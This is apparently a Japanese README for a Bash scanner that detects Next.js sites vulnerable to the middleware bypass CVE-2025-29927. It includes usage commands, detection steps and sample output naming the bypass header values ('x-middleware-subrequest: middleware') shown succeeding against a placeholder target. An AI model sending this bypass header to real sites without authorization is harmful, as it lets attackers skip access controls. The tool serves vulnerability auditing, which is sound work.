
CVE-2025-29927 エクスプロイトチェッカー
Next.jsアプリケーションがミドルウェアバイパス CVE-2025-29927に対して脆弱かどうかを検出するためのBash自動化ツール。Zhero Web Securityの調査に基づいています。
bashwhatwebcurlDebian/Ubuntuでは以下でインストール:
sudo apt install whatweb curl
./CVE-2025-29927.sh -u https://example.com
1行に1つずつURLを記述したurls.txtファイルを作成:
https://target1.com
https://target2.com
実行:
./nextjs_bypass_checker_v2.sh -l urls.txt
Next.jsの識別
whatwebを使用してテクノロジーを検出します。/_next/static/BUILD_IDおよび_buildManifest.jsの読み取りを試みます。ミドルウェアの検出
X-Middleware-RewriteX-Middleware-Set-Cookieバイパステスト
x-middleware-subrequestなしでリクエストを実行し、ヘッダーを検出します。[*] Analizando: https://victima.com
[+] WhatWeb:
-> Detectado: Next.js[12.2.0]
[+] BUILD_ID: 3fjd92hf8
[+] Versión detectada: 12.2.0
[+] Middleware activo (cabeceras detectadas):
X-Middleware-Rewrite: /not-found/locale=en
[+] Probando exploits:
-> x-middleware-subrequest: middleware -> ✅ BYPASS EXITOSO (cabeceras desaparecieron)
-> x-middleware-subrequest: src/middleware -> ❌ Middleware no evadido
[*] Finalizado: https://victima.com
このスクリプトは教育目的および許可された監査のみを対象としています。 同意なしにターゲットに対して使用しないでください。不正使用は違法行為となる可能性があります。
調査元: Zhero Web Security